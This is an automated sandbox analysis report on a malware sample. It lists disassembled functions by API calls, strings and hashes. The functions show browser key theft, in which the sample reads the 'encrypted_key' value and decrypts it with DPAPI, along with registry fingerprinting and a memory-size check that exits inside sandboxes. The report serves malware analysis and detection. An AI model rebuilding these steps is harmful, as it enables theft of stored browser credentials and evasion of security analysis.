Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: b35235786b948e0e6555158c1c0efb0b11028fcec8c55c6120cd3185db22f78a
Instruction ID: 130e8712b2d17d0f4a3aa70f9b32a38deb323cc32c4c6a80807e33934adfa5f1
Opcode Fuzzy Hash: b35235786b948e0e6555158c1c0efb0b11028fcec8c55c6120cd3185db22f78a
Instruction Fuzzy Hash: 0F211B71A112189BDB24DB54DC85FE9B3B9FB48704F1081D9E609A6180DF746AC5CF98

Function 00404800 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

Strings

<, xrefs: 00404819

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: ??2@$CrackInternetlstrlen
String ID: <
API String ID: 1683549937-4251816714
Opcode ID: 994daec21f0517629ae22a04d51c011e227e96814832a9a45039b376b6c0c140
Instruction ID: 160db8237089610cf3963e488d7c28046b69bb3d6c402c1973a99714a059ae02
Opcode Fuzzy Hash: 994daec21f0517629ae22a04d51c011e227e96814832a9a45039b376b6c0c140
Instruction Fuzzy Hash: 9F2149B1D00219ABDF14DFA5EC4AADD7B75FF04320F008229F925A7290EB706A19CF95

Function 00417820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417834
HeapAlloc.KERNEL32(00000000), ref: 0041783B
RegOpenKeyExA.KERNEL32(80000002,0096E558,00000000,00020119,00000000), ref: 0041786D
RegQueryValueExA.KERNEL32(00000000,00974068,00000000,00000000,?,000000FF), ref: 0041788E
RegCloseKey.ADVAPI32(00000000), ref: 00417898

Strings

Windows 11, xrefs: 0041784D

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3466090806-2517555085
Opcode ID: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
Instruction ID: 90abcce2ecfc2a5b8cd512a74185dd25ab23219ddadcc09848e79f4871c60c5e
Opcode Fuzzy Hash: ece6f01e7d5fd4039499d2cf589e258aec5fff7bd7b06dda1c9cbde8cad395cd
Instruction Fuzzy Hash: FD01A274E09304BBEB00DBE4ED49FAE7779EF48700F00419AFA04A7290E7749A40CB55

Function 004178B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 004178C4
HeapAlloc.KERNEL32(00000000), ref: 004178CB
RegOpenKeyExA.KERNEL32(80000002,0096E558,00000000,00020119,00417849), ref: 004178EB
RegQueryValueExA.KERNEL32(00417849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041790A
RegCloseKey.ADVAPI32(00417849), ref: 00417914

Strings

CurrentBuildNumber, xrefs: 00417901

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3466090806-1022791448
Opcode ID: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
Instruction ID: 4c9302de3449b24d107dc6acc84b9b99571be3b3dcaa7f8b3677a924de38e7e6
Opcode Fuzzy Hash: 14ae58864b366c4003c6da9e1b5cfb2a16c067edbf69ef05e192f5cb5c601d9e
Instruction Fuzzy Hash: 51014FB5E45309BBEB00DBE4DC4AFAEB779EF44700F10459AF605A6281E774AA408B91

Function 00414300 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00414325
RegOpenKeyExA.KERNEL32(80000001,00974680,00000000,00020119,?), ref: 00414344
RegQueryValueExA.ADVAPI32(?,00976050,00000000,00000000,00000000,000000FF), ref: 00414368
RegCloseKey.ADVAPI32(?), ref: 00414372
lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414397
lstrcatA.KERNEL32(?,00976080), ref: 004143AB

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: 5ab39f87e3c408f2a90f24169347c873da2d30c2c471e45419c7dcdc3ee26daa
Instruction ID: 95163f332e2e8486d22fa14c8026e7b1b291c890fe90cbe7f90fb3e747a5c624
Opcode Fuzzy Hash: 5ab39f87e3c408f2a90f24169347c873da2d30c2c471e45419c7dcdc3ee26daa
Instruction Fuzzy Hash: B641B8B6D001086BDB14EBA0EC46FEE773DAB8C300F04855EB7155A1C1EA7557888BE1

Function 004137B0 Relevance: 9.1, APIs: 6, Instructions: 122stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004137D8

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

strtok_s.MSVCRT ref: 00413921

Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,0096C238,?,004210F4,?,00000000), ref: 0041AB3B
Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrcpystrtok_s$lstrlen
String ID:
API String ID: 3184129880-0
Opcode ID: 6c6fb7d06333238994955fa4e9c6fc16004326b07765d99504ffdab069fb4719
Instruction ID: b6ea97cb77591b20574b5f8bad6a91ea9d9e82a59cceccb6aeafc47a8efa6348
Opcode Fuzzy Hash: 6c6fb7d06333238994955fa4e9c6fc16004326b07765d99504ffdab069fb4719
Instruction Fuzzy Hash: 9541A471E101099BCB04EFA5D945AEEB779AF44314F00801EF51677291EB78AA84CFAA

Function 0040A110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
LocalFree.KERNEL32(00410447), ref: 0040A1E0
CloseHandle.KERNEL32(000000FF), ref: 0040A1EA

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: a501a1be7f016b5cb91172ca14ff62cfed5f90a871d90683b41ae69171fc1efd
Instruction ID: e28607e9d9a2a96074382c0c0d30a82733061daf82e5a8752830093732aacc78
Opcode Fuzzy Hash: a501a1be7f016b5cb91172ca14ff62cfed5f90a871d90683b41ae69171fc1efd
Instruction Fuzzy Hash: 9731FC74A01209EFDB14CF94D845BEE77B5AB48304F10815AE911AB3D0D778AA91CFA6

Function 00415190 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 004151CA
lstrcatA.KERNEL32(?,00421058), ref: 004151E7
lstrcatA.KERNEL32(?,0096C548), ref: 004151FB
lstrcatA.KERNEL32(?,0042105C), ref: 0041520D

Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93

Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2

Strings

cA, xrefs: 00415235, 0041526A, 0041528F, 00415238, 0041526D

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID: cA
API String ID: 2667927680-2872761854
Opcode ID: 50cdb846a6905c3154a992a53ea717169949dcf7ee024cd193e9a8a380c2694b
Instruction ID: dc16e4b81abbfe3fe676fda19ddb0faac8fab1e973e0b9c2e11f24d889f851c9
Opcode Fuzzy Hash: 50cdb846a6905c3154a992a53ea717169949dcf7ee024cd193e9a8a380c2694b
Instruction Fuzzy Hash: CD21C8B6E04218A7CB14FB70EC46EED333E9B94300F40455EB656561D1EE78ABC8CB95

Function 00401220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
__aulldiv.LIBCMT ref: 00401258
__aulldiv.LIBCMT ref: 00401266
ExitProcess.KERNEL32 ref: 00401294

Strings

@, xrefs: 00401233

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
Instruction ID: 198c605b63268064c6e3321c907f2861ebf30c0b4d659eb8408d118d522d9ff8
Opcode Fuzzy Hash: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
Instruction Fuzzy Hash: 88014BF0D44308BAEB10DFE0DD4ABAEBB78AB14705F20849EE604B62D0D6785581875D

Function 61E4C7C5 Relevance: 8.0, APIs: 4, Strings: 1, Instructions: 467COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E4C91F
memcmp.MSVCRT ref: 61E4C973
memcmp.MSVCRT ref: 61E4C9F2
memcmp.MSVCRT ref: 61E4CC23

Strings

0, xrefs: 61E4CC0C

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID: memcmp
String ID: 0
API String ID: 1475443563-4108050209
Opcode ID: 3febbe9025790a98fcc424e7053522d0f7b55d065d40a9560c436ebf9cdeed3d
Instruction ID: 3bb57cbd4086e38ca070a1eb41e2420ec87b0c0feb17810d174f813009c16240
Opcode Fuzzy Hash: 3febbe9025790a98fcc424e7053522d0f7b55d065d40a9560c436ebf9cdeed3d
Instruction Fuzzy Hash: 66127D70F05255CFEB05CFA8E484789BBF1AF48318F25C1A9D845AB356D774E88ACB80

Function 0040A430 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA

Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0040A489

Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
Part of subcall function 0040A210: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
Part of subcall function 0040A210: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F

memcmp.MSVCRT(?,DPAPI,00000005), ref: 0040A4E2

Part of subcall function 0040A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A2D4
Part of subcall function 0040A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A2F3
Part of subcall function 0040A2B0: memcpy.MSVCRT(?,?,?), ref: 0040A316
Part of subcall function 0040A2B0: LocalFree.KERNEL32(?), ref: 0040A323

Strings

DPAPI, xrefs: 0040A4D9
, xrefs: 0040A511
"encrypted_key":", xrefs: 0040A480

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 3731072634-738592651
Opcode ID: 670b58208e1ff2a3ebe60e827019e5f1f1af2f7c111c07866c18d1fd8af9f875
Instruction ID: 27b9d937d1eb2b37959d1b0821c640950517226354c316aa9f1795df4e4508dc
Opcode Fuzzy Hash: 670b58208e1ff2a3ebe60e827019e5f1f1af2f7c111c07866c18d1fd8af9f875
Instruction Fuzzy Hash: 323152B6D00209ABCF04DBD4DC45AEFB7B8BF58304F44456AE901B7281E7389A54CB6A

Function 00417F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417FC7
HeapAlloc.KERNEL32(00000000), ref: 00417FCE
RegOpenKeyExA.KERNEL32(80000002,0096E590,00000000,00020119,?), ref: 00417FEE
RegQueryValueExA.KERNEL32(?,00974360,00000000,00000000,000000FF,000000FF), ref: 0041800F
RegCloseKey.ADVAPI32(?), ref: 00418022

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

